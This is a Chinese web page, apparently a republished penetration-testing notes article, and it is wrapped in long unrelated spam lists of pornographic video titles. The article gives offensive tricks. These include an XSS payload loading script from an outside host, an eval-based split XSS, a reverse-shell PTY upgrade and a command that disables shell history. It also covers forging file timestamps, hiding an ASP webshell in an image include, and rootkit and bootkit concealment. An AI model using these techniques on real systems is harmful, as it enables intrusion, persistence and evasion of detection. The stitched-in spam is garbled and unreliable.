精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

滲透測試筆記七

安全 黑客攻防
滲透測試筆記主要為一些短小但又精華的滲透小技巧,旨在與小伙伴們分享學(xué)習(xí)心得。為保證質(zhì)量,每一篇為20條左右的滲透小記。

滲透測試筆記主要為一些短小但又精華的滲透小技巧,旨在與小伙伴們分享學(xué)習(xí)心得。為保證質(zhì)量,每一篇為20條左右的滲透小記。

[[108761]]

1.提權(quán)后進(jìn)入遠(yuǎn)程桌面發(fā)現(xiàn) desktop locker(桌面鎖)

解決方法:

ctrl+shift+esc 一直按會出現(xiàn)資源管理器,鼠標(biāo)結(jié)束desktop locker即可

2.3389低權(quán)限用戶提權(quán)(這個(gè)情況似乎比較少見?)的時(shí)候或者日常滲透用軟件的時(shí)候可以

subst x: D:\XXX 用命令創(chuàng)建 X盤符 
遠(yuǎn)程桌面連接器-本地資源-詳細(xì)信息 -驅(qū)動(dòng)器-勾選新增的X盤符

可以把本地驅(qū)動(dòng)器映射到遠(yuǎn)程3389服務(wù)器上的X盤,放上常用提權(quán)工具方便滲透。

3.Rootkits:

Rootkits是linux/unix獲取root權(quán)限之后使得攻擊者可以隱藏自己的蹤跡和保留root訪問權(quán)限的神器,通常攻擊者使用 rootkit的檢查系統(tǒng)查看是否有其他的用戶登錄,如果只有自己,攻擊者就開始著手清理日志中的有關(guān)信息,通過rootkit的嗅探器還可以獲得其他系統(tǒng)的用戶和密碼!

目前常用的有:t0rn /mafix/enyelkm 等等。

Rootkits通常分為:應(yīng)用級別—內(nèi)核級別—-硬件級別,早期的是rootkit主要為應(yīng)用級rootkit通過替換login、ps、ls、 netstat等系統(tǒng)工具或修改.rhosts等系統(tǒng)配置文件等實(shí)現(xiàn)隱藏后門,硬件級RootKits主要是指Bios Rootkits,能夠在系統(tǒng)加載前獲得控制權(quán),通過向磁盤中寫入文件,再由引導(dǎo)程序加載該文件重新獲得控制權(quán)也可以采用虛擬機(jī)技術(shù),使整個(gè)操作系統(tǒng)運(yùn)行在rootkit掌握之中,目前常見的rootkit是內(nèi)核級rootkit,通過直接修改內(nèi)核來添加隱藏代碼實(shí)現(xiàn)控制系統(tǒng)的功能。

最為簡單實(shí)用的應(yīng)用級別Rootkit是通過將添加過提權(quán)代碼的命令替換系統(tǒng)中原始的命令來實(shí)現(xiàn)功能的,并且一般提供清理工具刪除wtmp、 utmp、lastlog等日志文件中自己的行蹤,并且復(fù)雜點(diǎn)的rootkit還可以向攻擊者提供telnel、shell和finger等服務(wù)。

4.LKM隱藏技術(shù):

LKM就是可裝載內(nèi)核模塊(Loadable Kernel Modules)。這些模塊本來是Linux系統(tǒng)用于擴(kuò)展其功能的。

木馬最大的特性就是隱蔽性,不能輕易讓人察覺,所以隱藏木馬相關(guān)信息是關(guān)鍵的因素。對于Linux操作系統(tǒng)來說,主要有靜態(tài)隱藏和動(dòng)態(tài)隱藏兩個(gè)標(biāo)準(zhǔn)。

由于Linux本身的安全性,想利用外殼程序隱藏木馬文件和進(jìn)程不可能實(shí)現(xiàn),所以就借要通過修改Linux內(nèi)核的系統(tǒng)調(diào)用來隱藏木馬相關(guān)信息,這就是LKM技術(shù)。

5.Bootkit:Bootkit是更高級的Rootkit,該概念最早于2005年被eEye Digital公司在他們的“BootRoot”項(xiàng)目中提及。它主要利用其內(nèi)核準(zhǔn)入和開機(jī)過程的隱身技術(shù),當(dāng)在功能上并無異于Rootkit。他們的不同主要表現(xiàn)在獲取準(zhǔn)入的方式上。傳統(tǒng)的rootkit利用系統(tǒng)啟動(dòng)時(shí)提升權(quán)限。而Bootkit是被安置在外設(shè)的主引導(dǎo)扇區(qū)和駐留在整個(gè)系統(tǒng)的啟動(dòng)過程。

Bootkit的引導(dǎo)扇區(qū)代碼總是在ROM BIOS執(zhí)行后主引導(dǎo)記錄被載入前劫持系統(tǒng)啟動(dòng)程序。一旦被載入到內(nèi)存,代碼便執(zhí)行中斷指令,也就是俗稱的HOOK掛鉤。它掛接到INT 13指示后續(xù)扇區(qū)讀取其信息。這個(gè)過程完成后,Bootkit試圖改變引導(dǎo)過程的結(jié)構(gòu)和操作邏輯流程。

6.用nst的反彈后門連上nc后不能su交互,報(bào)錯(cuò)如下:

standard in must be a tty

解決方法:

python -c ’import pty; pty.spawn(“/bin/sh”)’

得到shell就可以su進(jìn)行交互了。

7.history不記錄:

unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0

8、自己嘗試最短的引入外部腳本的xss payload(28個(gè)字符):

<script src=http://e1v.cn/pj

9、有文章稱

<script src=//xxx.xxx/a.js></script>

也可以插入,但是實(shí)測證明,不是每個(gè)瀏覽器都支持沒有http:的插入。要有效可靠的插入,還是參考上一條的插入方法。

10、實(shí)在要短得不行的,那就分開來插吧:

<script>var a=’alert’</script>
<script>var b=’(“xss”)’</script>
<script>var c=a+b </script>
<script> eval(c) </script>

11、C類IP地址:C類數(shù)字相同的IP地址,通常是同一臺服務(wù)器或是處于同一網(wǎng)絡(luò)上的服務(wù)器。所以如果兩個(gè)網(wǎng)站IP地址前三個(gè)數(shù)字相同,如198.197.196.195和198.197.196.194,搜索引擎會認(rèn)為這兩個(gè)網(wǎng)站之間是有一定關(guān)系的,很可能在同一架服務(wù)器上。

12、URL靜態(tài)化:通過URL重寫技術(shù),將動(dòng)態(tài)URL轉(zhuǎn)化為靜態(tài)URL。在LAMP主機(jī)上,URL重寫通常是通過mod_rewrite模塊;在windows主機(jī)上,通常是通過ISAPI Rewrite或是 IIS Rewrite模塊。

13、在nmap目錄下有很多掃描腳本,可以實(shí)現(xiàn)很多智能化的功能,具體在/nmap/scripts這個(gè)目錄下:使用方法:

nmap -P0 --script= smb-check-vulns 192.168.XXX.XX

14、常用的nmap掃描類型參數(shù)主要有:

-sT TCP connect掃描

-sS TCP SYN掃描

-sF -sX -sN 通過設(shè)置一些特殊的標(biāo)記位來避開防火墻的檢測

-sP 利用ping來探測主機(jī)是否存活

-sU 探測主機(jī)開放了哪些UDP端口

-sA TCP ACK掃描

-sV 探測端口上面運(yùn)行的詳細(xì)信息

15、常用的nmap掃描選項(xiàng)有:

-O 探測主機(jī)操作系統(tǒng)

-A 比較高級的主機(jī)旗標(biāo)探測

-Pn 不利用ping命令來探測主機(jī)是否存活

-F 快速掃描模式

-p<端口范圍>

16、使用icyfox-time.exe修改文件的時(shí)間屬性:

icyfox-time.exe "e:\web\yuan.asp" e:\web\gai.asp

注意:第一個(gè)文件路徑需要用雙引號,第二個(gè)不需要。這樣就把”e:\web\gai.asp”這個(gè)文件的時(shí)間改為和”e:\web\yuan.asp”文件一樣啦。

17、更加隱蔽的asp網(wǎng)站留后門的方法:

上傳一只一句話圖片馬,具體制作方法請參見“圖種技術(shù)”;然后在你要插入一句話的頁面里插入一下代碼語句:

<!--#include file="圖片馬路徑"-->

18、關(guān)于上傳漏洞的檢測步驟:

(1).上傳文件是否有格式限制,是否可以上傳exe文件;

(2).上傳文件是否有大小限制,上傳太大的文件是否導(dǎo)致異常錯(cuò)誤,上傳0K的文件是否會導(dǎo)致異常錯(cuò)誤,上傳并不存在的文件是否會導(dǎo)致異常錯(cuò)誤;

(3).通過修改擴(kuò)展名的方式是否可以繞過格式限制,是否可以通過壓包方式繞過格式限制;

(4).是否有上傳空間的限制,是否可以超過空間所限制的大小,如將超過空間的大文件拆分上傳是否會出現(xiàn)異常錯(cuò)誤。

(5).上傳文件大小大于本地剩余空間大小,是否會出現(xiàn)異常錯(cuò)誤。

(6).關(guān)于上傳是否成功的判斷。上傳過程中,中斷。程序是否判斷上傳是否成功。

(7).對于文件名中帶有中文字符,特殊字符等的文件上傳。

19、跨站請求偽造(CSRF)

(1).同個(gè)瀏覽器打開兩個(gè)頁面,一個(gè)頁面權(quán)限失效后,另一個(gè)頁面是否可操作成功。

(2).當(dāng)頁面沒有驗(yàn)證碼時(shí),查看頁面源代碼,查是是否有token。如果頁面完全是展示頁面,是不會有token的。

責(zé)任編輯:藍(lán)雨淚 來源: 網(wǎng)絡(luò)安全攻防實(shí)驗(yàn)室
相關(guān)推薦

2013-11-28 13:03:17

2013-11-28 11:29:39

2013-12-30 13:11:03

2013-11-28 10:32:10

2013-12-10 09:51:18

2013-12-24 13:15:59

2014-04-03 09:35:28

2014-11-21 10:32:33

2009-01-08 21:25:51

程序員筆記

2014-05-16 10:55:47

Spark

2023-07-06 14:07:30

2010-08-03 22:09:16

2013-11-06 16:38:59

2021-07-15 10:46:21

滲透測試網(wǎng)絡(luò)安全網(wǎng)絡(luò)攻擊

2016-09-09 01:14:17

2017-07-24 17:00:49

2010-09-13 11:05:08

2010-09-09 21:10:22

2016-10-10 22:11:02

2013-05-27 13:37:06

點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號

久久久高清一区二区三区| 一道在线中文一区二区三区| 一区二区在线电影| 成人晚上爱看视频| 日韩精品一区二区三区老鸭窝 | 中文字幕欧美激情一区| 亚洲一区二区三区成人在线视频精品| jizz国产免费| 成人在线免费观看视频| 欧美va亚洲va香蕉在线 | 捆绑调教美女网站视频一区| 欧美高清不卡在线| 性猛交娇小69hd| 97久久超碰| 欧美特级限制片免费在线观看| 成人毛片100部免费看| 国产视频网址在线| 成人午夜精品一区二区三区| 国产伦精品一区二区三区精品视频| 欧美日韩在线国产| 日本午夜一区| 亚洲国产精品一区二区三区| 天美一区二区三区| jizz免费一区二区三区| 疯狂做受xxxx高潮欧美日本 | 亚洲AV无码国产精品| 国产亚洲高清一区| 欧美日韩久久久| 国产黄色特级片| а√天堂中文在线资源8| 国产精品久久久久久久裸模| 欧美另类一区| 性感美女一级片| 国产成人免费视频| 国产美女精品视频免费观看| 国产免费www| 亚洲综合电影一区二区三区| 国内自拍欧美激情| 强行糟蹋人妻hd中文| 欧美3p视频| 在线观看久久av| 日韩人妻无码精品综合区| 麻豆精品av| 亚洲激情在线观看视频免费| 无码人妻一区二区三区一| 国产免费av国片精品草莓男男| 欧美特级限制片免费在线观看| 免费在线观看毛片网站| 成人片免费看| 一本到不卡免费一区二区| 午夜精品久久久久久久无码| 国产无遮挡裸体视频在线观看| 一区二区国产盗摄色噜噜| 三级网在线观看| 欧美性天天影视| 中文字幕一区二区日韩精品绯色| 亚洲国产一区二区精品视频 | 欧美国产美女| 日韩在线精品视频| 国产wwwwxxxx| 91久久夜色精品国产按摩| 中文字幕精品av| 欧美性猛交xxxx乱大交少妇| 91综合视频| 久久香蕉国产线看观看av| h色网站在线观看| 一区二区日韩欧美| 欧美激情喷水视频| 在线能看的av| 日韩精品一区第一页| 国产免费一区二区三区在线观看 | 国产一级片免费| 亚洲国产网站| 国产不卡视频在线| 中文字幕av久久爽| 国产一区二区三区四区五区美女| 99re视频在线播放| 三级网站免费观看| 欧美极品另类videosde| 在线一区亚洲| 成人免费高清观看| 色婷婷一区二区| 午夜免费看毛片| 一本色道69色精品综合久久| 精品视频久久久| 911国产在线| 在线观看亚洲| 国产精品美女午夜av| 国产sm主人调教女m视频| 99久久免费视频.com| 欧美aaaaa喷水| 老司机午夜在线| 精品人伦一区二区三区蜜桃网站| 美女少妇一区二区| 最新国产精品精品视频| 国产一区二区三区在线视频| 国产一二三四区| 蜜桃av一区| 5566中文字幕一区二区| 免费在线观看一级毛片| 亚洲色大成网站www久久九九| 人妻久久久一区二区三区| 欧美网站免费| 精品调教chinesegay| 久久国产波多野结衣| 亚洲主播在线| 不卡一区二区三区四区五区| 国产中文在线视频| 亚洲一区在线观看网站| 黄色三级视频在线| 欧美午夜寂寞| 欧美另类在线观看| 国模私拍一区二区| 波多野结衣91| 懂色av一区二区三区四区五区| 亚洲最新无码中文字幕久久| 日韩欧美一区二区久久婷婷| 久久久久无码精品国产sm果冻| 亚洲黄色视屏| 久久久久久久网站| 污视频在线免费观看一区二区三区 | 操喷在线视频| 欧美精品在线一区二区| 国精产品一区一区三区免费视频 | 欧美成人免费视频| 中文字幕 国产| 久久一二三国产| 777av视频| 日韩综合一区二区三区| 中文国产成人精品| 精产国品一区二区| 99视频在线精品| 成人一级生活片| 国产精品视频首页| 北条麻妃99精品青青久久| 久久久久久久久久久影院| 成人黄色在线视频| 黄色三级中文字幕| 成人精品视频在线观看| 日韩在线视频导航| 一炮成瘾1v1高h| 国产精品美女一区二区三区| 熟女人妇 成熟妇女系列视频| 日韩理论电影中文字幕| 91av免费观看91av精品在线| 天堂在线资源库| 大荫蒂欧美视频另类xxxx| 这里只有精品在线观看视频| 亚洲大胆av| 精品高清视频| 在线观看特色大片免费视频| 亚洲欧美精品一区| 五月天婷婷导航| 国产日韩一级二级三级| 激情 小说 亚洲 图片: 伦| 精品久久综合| 91久久国产婷婷一区二区| 老司机午夜在线视频| 69堂成人精品免费视频| 爱爱视频免费在线观看| 丰满白嫩尤物一区二区| 欧美啪啪免费视频| 精品一区三区| 国产精品私拍pans大尺度在线| 69久久精品| 欧美一卡在线观看| 久操网在线观看| 亚洲国产精品午夜在线观看| 国产成人鲁色资源国产91色综| www.夜夜爱| 色综合www| 国产精品久久久久久av下载红粉| 91短视频版在线观看www免费| 欧美日韩精品一区二区天天拍小说| 日本 欧美 国产| 福利一区在线观看| 成人观看免费完整观看| 日本一区二区在线看| 91免费电影网站| 国产探花视频在线观看| 亚洲乱码国产乱码精品精| 中文字幕av网站| 亚洲欧美成aⅴ人在线观看| 免费不卡的av| 久久天堂成人| 中国黄色录像片| 欧美wwwwww| 国产精品影片在线观看| 青草在线视频在线观看| 日韩精品在线视频美女| 国产精品乱码久久久| 午夜一区二区三区视频| 9.1片黄在线观看| 成人福利视频网站| 色综合天天色综合| 亚洲第一毛片| 亚洲精品视频一二三| 97久久综合区小说区图片区| 国产成人拍精品视频午夜网站| 男女啪啪的视频| 日韩伦理福利| 久久亚洲精品国产亚洲老地址| 手机看片福利在线| 欧美剧情电影在线观看完整版免费励志电影| 久久久精品视频在线| 国产夜色精品一区二区av| 精品国产一二区| 人人狠狠综合久久亚洲| 免费特级黄色片| 无需播放器亚洲| 欧美日韩在线一二三| 91成人短视频| 国产一区玩具在线观看| 囯产精品久久久久久| 国产在线中文字幕| av网站在线播放| 中中文字幕av在线| 欧美日韩黄网站| 亚洲精品视频免费| 国产三级漂亮女教师| 午夜精品福利一区二区三区av| 欧美成人短视频| www精品美女久久久tv| 女人扒开腿免费视频app| 日韩国产精品久久久| 蜜臀av无码一区二区三区| 91精品1区| 一区二区三区视频在线播放| 一本色道久久综合狠狠躁的番外| 久久99精品国产91久久来源| 九九热久久66| 亚洲专区**| 91最新国产视频| 日韩伦理一区二区| 国产精品青青在线观看爽香蕉| 涩涩av在线| 18久久久久久| 三级在线观看视频| 91精品国产91久久久久久不卡| 美国黄色特级片| 青青草97国产精品免费观看| 波多野结衣50连登视频| 欧美激情无毛| 成人在线免费观看网址| 外国成人激情视频| 日韩第一页在线观看| 日韩在线不卡| 一级做a爰片久久| 91一区二区三区四区| 椎名由奈jux491在线播放| 秋霞欧美视频| 亚洲精品国产精品国自产观看| 国产成人黄色| 欧美日本韩国国产| 亚洲日本三级| 日韩国产一区久久| 日韩电影二区| 国产手机视频在线观看| 在线观看国产精品入口| 人人妻人人澡人人爽欧美一区| 欧美精品麻豆| 日韩国产欧美亚洲| 免播放器亚洲| 最近中文字幕一区二区| 精品一区二区免费| 激情成人在线观看| 成人精品视频一区| 亚洲欧美在线不卡| 久久久久久久久久久99999| 国产精品久久久视频| 自拍偷拍国产亚洲| 国产精品第108页| 日韩欧美999| 在线视频 中文字幕| 欧美一区二区三区精品| 国产91免费在线观看| 亚洲欧美激情精品一区二区| av大全在线免费看| 欧美精品在线看| 色吧亚洲日本| 国产精品视频区1| 日韩精品视频中文字幕| 精品欧美国产| 色综合久久网| 免费无码毛片一区二三区| 日本人妖一区二区| 国产精品精品国产| 国产99免费视频| 欧美日韩免费高清一区色橹橹| 国产av一区二区三区精品| 日韩精品久久久久久福利| avav免费在线观看| 欧美精品久久久久| 成人国产一区| 国产一区国产精品| 999久久久91| 少妇无码av无码专区在线观看| 秋霞影院一区二区| www.com日本| 中文字幕第一区综合| 国产无遮挡aaa片爽爽| 欧美日韩在线三区| 免费国产羞羞网站视频| 色哟哟入口国产精品| 婷婷电影在线观看| 91九色在线免费视频| 狠狠综合久久av一区二区蜜桃| 国产一区 在线播放| 免费在线观看一区二区三区| 青青草视频网站| 亚洲视频狠狠干| 国产免费www| 日韩二区三区在线| 先锋成人av| 国产伦精品一区二区三区精品视频| 任你躁在线精品免费| 欧美精品在欧美一区二区| 久久精品av麻豆的观看方式| av无码av天天av天天爽| 一区二区三区国产豹纹内裤在线| 真实的国产乱xxxx在线91| 日韩av影视综合网| 免费电影视频在线看| 91精品久久久久| 日韩精品首页| www.xxx亚洲| 久久婷婷色综合| 国产乡下妇女做爰视频| 欧美成人精品3d动漫h| 精品国产丝袜高跟鞋| 国产精品男女猛烈高潮激情| 香蕉人人精品| 99热在线这里只有精品| 成人国产在线观看| 久久久久成人精品无码| 日韩网站在线看片你懂的| 超碰在线caoporn| 91久久精品国产91久久性色tv| 91精品国产自产拍在线观看蜜| 亚洲欧美日韩三级| 中文字幕亚洲不卡| 在线观看国产精品入口男同| 这里只有精品视频在线| 日韩高清在线| 日韩视频精品| 蜜臀av国产精品久久久久| www.日本高清视频| 欧美私人免费视频| 欧美尤物美女在线| 成人激情视频在线| 欧美在线亚洲综合一区| 亚洲妇女无套内射精| 亚洲午夜三级在线| 丁香六月色婷婷| 97精品视频在线播放| 在线亚洲a色| 国产理论在线播放| 在线亚洲欧美日韩| 欧美大肚乱孕交hd孕妇| 青草青在线视频| 国产精品免费一区二区三区四区| 狠狠88综合久久久久综合网| 无码人妻丰满熟妇区毛片蜜桃精品| 亚洲精选在线视频| 好吊色视频一区二区| 456亚洲影院| av永久不卡| 宇都宫紫苑在线播放| 亚洲成人tv网| 国产三级视频在线看| 国产三级精品网站| 午夜激情一区| 一区二区三区免费在线观看视频| 色天使久久综合网天天| 亚洲1卡2卡3卡4卡乱码精品| 91沈先生播放一区二区| 亚洲大胆在线| 我不卡一区二区| 欧美一级二级三级乱码| a级大胆欧美人体大胆666| 欧美性色黄大片人与善| 久久国产成人午夜av影院| 久一视频在线观看| 亚洲欧美三级伦理| 国产一区二区三区| 国产极品尤物在线| 国产精品久久午夜| 亚洲精品成av人片天堂无码 | 欧美高清视频在线高清观看mv色露露十八| 成人毛片av在线| 久久综合给合久久狠狠色| 蜜乳av一区二区| 日本三级理论片| 中文字幕在线成人| 成人精品毛片| 午夜两性免费视频| 午夜久久久影院| 欧美精品电影| 欧美日韩高清在线一区| 国产精品影视在线观看|